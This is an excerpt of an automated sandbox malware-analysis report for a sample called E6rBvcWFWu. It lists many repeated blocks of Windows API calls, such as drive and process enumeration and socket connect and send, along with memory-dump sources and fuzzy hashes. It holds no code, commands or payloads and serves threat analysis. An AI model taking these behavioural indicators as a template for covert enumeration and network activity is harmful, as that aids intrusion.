                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 2e47141f8f16f5d3cf3693cf86fa2049507a7711d19fd0d7c7e070e978afd588
                                    • Instruction ID: 754064f666fb7239ed206d43ecb5f9a034d8f081bf5d757cd0e80924e664d4a3
                                    • Opcode Fuzzy Hash: 2e47141f8f16f5d3cf3693cf86fa2049507a7711d19fd0d7c7e070e978afd588
                                    • Instruction Fuzzy Hash: 2151C5EB26D231BEB202C1956B14AFB6BAED5C7730771C827F407C6552D2980EAB7035
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 406e1da141d0c7345517ba568b2b26c64ef49072666ac8e0ac97b51ed6ea8346
                                    • Instruction ID: 9c59a5be552492b5b03ba1d63da88590ab9ba30c9a698bca50530173562ca170
                                    • Opcode Fuzzy Hash: 406e1da141d0c7345517ba568b2b26c64ef49072666ac8e0ac97b51ed6ea8346
                                    • Instruction Fuzzy Hash: C251B4EB26C131BE7102C1956B54AFB6BAEE5C77307B1C827F407D6521E2980EAB7035
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: b0ba3f8d1cafbe4de73e8ae71f25a3209682566b0aebce00c8c75438ac8cd90c
                                    • Instruction ID: a24b9e9232f500bbba9a0927480c2431a2d42a743c2f5020cbfa1b77135494d2
                                    • Opcode Fuzzy Hash: b0ba3f8d1cafbe4de73e8ae71f25a3209682566b0aebce00c8c75438ac8cd90c
                                    • Instruction Fuzzy Hash: 1751B5EB26D131BE7102C1956B14AFB67AEE5C7730771C82BF407C5511E2980E6B7035
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: b0e52dc4444c7190100be9d6ba5e549a602c8644f5d420dec1c59dc3acee0c13
                                    • Instruction ID: 822b2ff64255695720df575d1d7581fcfc5cee87c2a7eba78ca2029befb65991
                                    • Opcode Fuzzy Hash: b0e52dc4444c7190100be9d6ba5e549a602c8644f5d420dec1c59dc3acee0c13
                                    • Instruction Fuzzy Hash: 1E5193EB26D231BE7102C1952B14AFB57AEE5C7730771C827F407C6521E2980EAB7035
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 01b10fa3c96e4fe10c6b57b70c12dc387327a3e8490ba30893c814b4e809cc16
                                    • Instruction ID: 3705589fb709939cb82e32b2c52fc6ef37baa415afdfdc72c0c4d0319521fd7f
                                    • Opcode Fuzzy Hash: 01b10fa3c96e4fe10c6b57b70c12dc387327a3e8490ba30893c814b4e809cc16
                                    • Instruction Fuzzy Hash: 6F51D5EB26C231BE7202C5916B14AFA5BEEE5C7730771C827F407C5512E2980E6B7135
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: f727e47ef8959313026755dfdc4667264b0fff0084c523184723dfc43731c06a
                                    • Instruction ID: 771525a21bdb1b9c784034bec77b8cf72c809d10adab0ba1328ea92d6f728bf0
                                    • Opcode Fuzzy Hash: f727e47ef8959313026755dfdc4667264b0fff0084c523184723dfc43731c06a
                                    • Instruction Fuzzy Hash: A951A2EB26C231BEB102C5912B14AFB57EEE5C77307B1C827F407C6511E2980EAB6135
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: e14e093648afc721ae58d465794f1ff1bbad9ce0a68162956f0c6018c29969e2
                                    • Instruction ID: 764acfe995cf7e9d564829b38e9692f1b01e2ad3dda4267480bc17507394d9fe
                                    • Opcode Fuzzy Hash: e14e093648afc721ae58d465794f1ff1bbad9ce0a68162956f0c6018c29969e2
                                    • Instruction Fuzzy Hash: 184190EB26D231BD7102C1912B14AFA57AEE5C7730771C837F807C6512E2984EAB7135
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 4e89b37384848a769a3e73a1ffa27a387d3c93469b4e2757c934402f79c5003f
                                    • Instruction ID: 401d78fb4823a608716c9f5611fa15d0a0afb9c60039ea2fb82b298fa57c8091
                                    • Opcode Fuzzy Hash: 4e89b37384848a769a3e73a1ffa27a387d3c93469b4e2757c934402f79c5003f
                                    • Instruction Fuzzy Hash: A241A1EB26C231BD7142C1956B14AFA57AEE5C7730B71C82BF807C5512E2980EAF7135
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 248f61aa2fe2bd41373e85b5f3d95d7731c26c9b339f88b13c3dfc48d739f97c
                                    • Instruction ID: 75d213116431787af923dd19cfa400c00904d5de9fb218379b0dd7a307433ccc
                                    • Opcode Fuzzy Hash: 248f61aa2fe2bd41373e85b5f3d95d7731c26c9b339f88b13c3dfc48d739f97c
                                    • Instruction Fuzzy Hash: 16419FEB26C231BD7242C1952B14AFB67AEE5C77307B1C827F807C6511E2984EAB7035
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: ca71e6b7e9bd86e20c7a34c51d8f5b108b10feccb3fd4b8ba2d9f7382701ede5
                                    • Instruction ID: 0c570cc5865bfdcfe66474dfb0d76f29ecdf112b72f558ea383813dd74a99751
                                    • Opcode Fuzzy Hash: ca71e6b7e9bd86e20c7a34c51d8f5b108b10feccb3fd4b8ba2d9f7382701ede5
                                    • Instruction Fuzzy Hash: BD41C1EB26C231BD7142C1912B14AFB67AEE5C77307B1C827F807C6512E2980EAB7135
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: d5627fea452be03344b7c43ff9278a6725e806ae17b0b41559b45d9546aebc29
                                    • Instruction ID: 64271618c0f807ad65c6479f60bfbdd378c0afd030dc4029f5ccb6ad52e332fe
                                    • Opcode Fuzzy Hash: d5627fea452be03344b7c43ff9278a6725e806ae17b0b41559b45d9546aebc29
                                    • Instruction Fuzzy Hash: ED41D5EB26C231BDB242C1856B10AFB5BEEE5C77307B1C827F402C5551E2940EAB7135
                                    APIs
                                    • GetLogicalDrives.KERNELBASE(?,64F24C87), ref: 0742041D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558569880.0000000007420000.00000040.00001000.00020000.00000000.sdmp, Offset: 07420000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7420000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: DrivesLogical
                                    • String ID: A:\
                                    • API String ID: 999431828-3379428675
                                    • Opcode ID: 21c2357fef0c2b53bf028f1d584f14d6873ab59798c9d89c1107c4900745987f
                                    • Instruction ID: 2807f715d757f2f5364623a269ca63e743c02d4f472e592eb512fe4d65c9f41a
                                    • Opcode Fuzzy Hash: 21c2357fef0c2b53bf028f1d584f14d6873ab59798c9d89c1107c4900745987f
                                    • Instruction Fuzzy Hash: A941E5EB26C231BDB202C1956B10AFA5BEEE5C7730771C827F807C6552E2944EAB6135
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: closesocket
                                    • String ID: FD %s:%d sclose(%d)
                                    • API String ID: 2781271927-3116021458
                                    • Opcode ID: 1eec6daa7115310aaca65efccabf13ffd30a2b59c72cc829c92016f7e2a6cf3a
                                    • Instruction ID: be19fabbbe166c934d16306f2307ae8d17919d5e2a2272aadf631959f3a87c2f
                                    • Opcode Fuzzy Hash: 1eec6daa7115310aaca65efccabf13ffd30a2b59c72cc829c92016f7e2a6cf3a
                                    • Instruction Fuzzy Hash: 9BD05E3290A2316B85206599AC49C9F7AA99EC6F60B16486DF85477201D2209C0187E3
                                    APIs
                                    • connect.WS2_32(-00000028,-00000028,-00000028,-00000001,-00000028,?,-00000028,0073B29E,?,00000000,?,?), ref: 0073B0BA
                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,00000000,0000000B,?,?,00723C41,00000000), ref: 0073B0C1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    • Associated: 00000000.00000002.1554466600.0000000000670000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1554495886.0000000000C31000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1554495886.0000000000D95000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1554495886.0000000000D97000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555156886.0000000000D9A000.00000004.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000000D9C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000000F25000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000001037000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.000000000103A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.0000000001112000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.000000000111C000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555184570.000000000112A000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555494765.000000000112B000.00000080.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555618520.00000000012E8000.00000040.00000001.01000000.00000003.sdmp
                                    • Associated: 00000000.00000002.1555639064.00000000012EA000.00000080.00000001.01000000.00000003.sdmp
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: ErrorLastconnect
                                    • String ID:
                                    • API String ID: 374722065-0
                                    • Opcode ID: 2a4adfad1204e46ce4c0c004dad473bf7c57101321550bce5724c1305057f04c
                                    • Instruction ID: 7daa9f88bea77c66c1fe4f993e3fe4154ba43a6c55424d07f9d96291ddf23856
                                    • Opcode Fuzzy Hash: 2a4adfad1204e46ce4c0c004dad473bf7c57101321550bce5724c1305057f04c
                                    • Instruction Fuzzy Hash: E701D8363043009BEA245A68DD84F6BB399FF89364F040B64FA78971D2D72AED508761
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: e54072e9477a000ae31bda638aaee6f70dbc46352a32b5f366317dd489d859bf
                                    • Instruction ID: 314331671400e8077b1b54f8d56ce85fef747dd21b53e9cdc699ba3e1794ccf9
                                    • Opcode Fuzzy Hash: e54072e9477a000ae31bda638aaee6f70dbc46352a32b5f366317dd489d859bf
                                    • Instruction Fuzzy Hash: C0518DEF29C111BDB20281612B64AFB676EE6D3330B30883BFC07C6563E6D94A4B5471
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 6e770e8aa187d750f5d31e7d686e228d3fedfaca955dc221aa08bb0f4bfc2dac
                                    • Instruction ID: c83c8957f4c67720df2e8b6686c50ad904cbf7c5863c88543c782bd54f084363
                                    • Opcode Fuzzy Hash: 6e770e8aa187d750f5d31e7d686e228d3fedfaca955dc221aa08bb0f4bfc2dac
                                    • Instruction Fuzzy Hash: 22515BEF25C111BDB20281616B64AFB5B6EE6D3730B30882BFC07D6563E2D84A4B5571
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 2f877036171a1bf6b16c24f3fe4b39af3897b55170d39a0943d7855e706e0eee
                                    • Instruction ID: a08e837bf0e75e8b24630ec4b3ff7fe1e02fc5b66f7da98f7b1a36e11fa58f87
                                    • Opcode Fuzzy Hash: 2f877036171a1bf6b16c24f3fe4b39af3897b55170d39a0943d7855e706e0eee
                                    • Instruction Fuzzy Hash: 91415CEF25C111BDB20291612B64AFB676EE6D7730B30883BFC07D6563E2D84A4B5471
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    • Opcode ID: 207b9380b2466e5daa13e3704e767166dc68db9def35c636384da650607de129
                                    • Instruction ID: d5507c9fea092bed52748a34cdeec7bab52018db352640d91da359067051ab23
                                    • Opcode Fuzzy Hash: 207b9380b2466e5daa13e3704e767166dc68db9def35c636384da650607de129
                                    • Instruction Fuzzy Hash: 84415CEF26C111BDB20291612B64AFB676EE6D7730B30882BFC07D6563E2D84A4F5471
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 95a7bb04404facce849aa243a99f5335d882bc01a561ea13cb95408fd4809209
                                    • Instruction ID: c7c60e6f15c3d43984310d4dbbb52a4c0dbb41111384b293a8e5b5797dcc7610
                                    • Opcode Fuzzy Hash: 95a7bb04404facce849aa243a99f5335d882bc01a561ea13cb95408fd4809209
                                    • Instruction Fuzzy Hash: F3412DEF29C111BDB10291612B64AFB576EE6D3730B30882BFC07D6563E2D84A4F5571
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558735439.0000000007460000.00000040.00001000.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7460000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    APIs
                                    • gethostname.WS2_32(00000000,00000040), ref: 00724AA5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: gethostname
                                    • String ID:
                                    • API String ID: 144339138-0
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558735439.0000000007460000.00000040.00001000.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7460000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    APIs
                                    • Process32FirstW.KERNEL32(?,7767B92F,7767B92F,?), ref: 074507F3
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558672497.0000000007450000.00000040.00001000.00020000.00000000.sdmp, Offset: 07450000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7450000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: FirstProcess32
                                    • String ID:
                                    • API String ID: 2623510744-0
                                    APIs
                                    • getsockname.WS2_32(?,?,00000080), ref: 0073AFD1
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: getsockname
                                    • String ID:
                                    • API String ID: 3358416759-0
                                    APIs
                                    • send.WS2_32(?,?,?,00000000,00000000,?), ref: 0073A97E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: send
                                    • String ID:
                                    • API String ID: 2809346765-0
                                    APIs
                                    • socket.WS2_32(?,0073B280,00000000,-00000001,00000000,0073B280,?,?,00000002,00000011,?,?,00000000,0000000B,?,?), ref: 0073AF67
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1554495886.0000000000671000.00000040.00000001.01000000.00000003.sdmp, Offset: 00670000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_670000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: socket
                                    • String ID:
                                    • API String ID: 98920635-0
                                    APIs
                                    • Process32NextW.KERNEL32(00000027,00000027,?,?), ref: 074603CE
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1558735439.0000000007460000.00000040.00001000.00020000.00000000.sdmp, Offset: 07460000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7460000_E6rBvcWFWu.jbxd
                                    Similarity
                                    • API ID: NextProcess32
                                    • String ID:
                                    • API String ID: 1850201408-0
                                    • Opcode ID: 6edb36fef2dd5c4b1c8f9f36d67966fa5f5263c203bc09e61ea4685ae5ef2c8b
                                    • Instruction ID: 2912e6a882577fc7c3186457a586a229c5663d6791e2362003585b70d646b53e
                                    • Opcode Fuzzy Hash: 6edb36fef2dd5c4b1c8f9f36d67966fa5f5263c203bc09e61ea4685ae5ef2c8b
